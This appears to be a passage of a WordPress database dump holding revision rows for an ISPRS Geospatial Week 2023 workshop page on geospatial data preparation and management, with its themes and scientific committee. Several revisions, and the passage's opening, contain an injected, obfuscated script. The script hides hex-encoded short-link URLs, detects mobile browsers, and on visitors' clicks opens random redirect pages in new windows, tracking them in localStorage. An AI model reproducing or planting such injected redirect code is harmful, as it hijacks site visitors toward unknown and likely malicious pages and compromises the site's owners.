function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:44:06','2022-11-04 20:44:06','',2993,'https://gsw2023.com/?p=3003',0,'revision','',0),
(3004,1,'2022-11-04 20:46:43','2022-11-04 20:46:43','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:46:43','2022-11-04 20:46:43','',2993,'https://gsw2023.com/?p=3004',0,'revision','',0),
(3005,1,'2022-11-04 20:47:15','2022-11-04 20:47:15','','ws18m2','','inherit','open','closed','','ws18m2','','','2022-11-04 20:47:15','2022-11-04 20:47:15','',2993,'https://gsw2023.com/wp-content/uploads/2022/11/ws18m2.jpg',0,'attachment','image/jpeg',0),
(3006,1,'2022-11-04 20:47:46','2022-11-04 20:47:46','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, 